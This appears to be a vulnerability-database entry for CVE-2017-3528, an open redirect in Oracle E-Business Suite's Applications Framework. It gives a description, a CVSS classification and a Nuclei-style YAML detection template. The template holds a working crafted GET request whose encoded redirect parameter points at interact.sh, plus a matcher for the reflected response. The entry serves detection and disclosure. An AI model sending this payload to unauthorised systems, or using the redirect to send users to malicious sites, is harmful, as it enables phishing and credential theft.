CVE-2017-3528: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect

2025-08-01 Oracle E-Business Suite PoC Public

Description

The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.

PoC

id: CVE-2017-3528

info:
  name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.'
  impact: |
    Attackers can redirect users to malicious sites for phishing attacks, malware distribution, or credential theft.
  remediation: |
    Apply the necessary patches or updates provided by Oracle to fix the open redirect vulnerability.
  reference:
    - https://blog.zsec.uk/cve-2017-3528/
    - https://www.exploit-db.com/exploits/43592
    - https://nvd.nist.gov/vuln/detail/CVE-2017-3528
    - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
    - http://www.securitytracker.com/id/1038299
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2017-3528
    cwe-id: CWE-601
    epss-score: 0.14622
    epss-percentile: 0.96473
    cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: applications_framework
  tags: cve,cve2017,oracle,redirect,edb,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"

    matchers:
      - type: word
        part: body
        words:
          - 'noresize src="/\interact.sh?configName='
# digest: 4b0a00483046022100f61869cf6c1c1123392842f4ddb1c57b0bfa3c24e07370653ed341d170ae807b02210093e6d5b63b7bf354229bbb6d4100ddc5ec5aec5ff328ddb2a919315bc8b41701:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities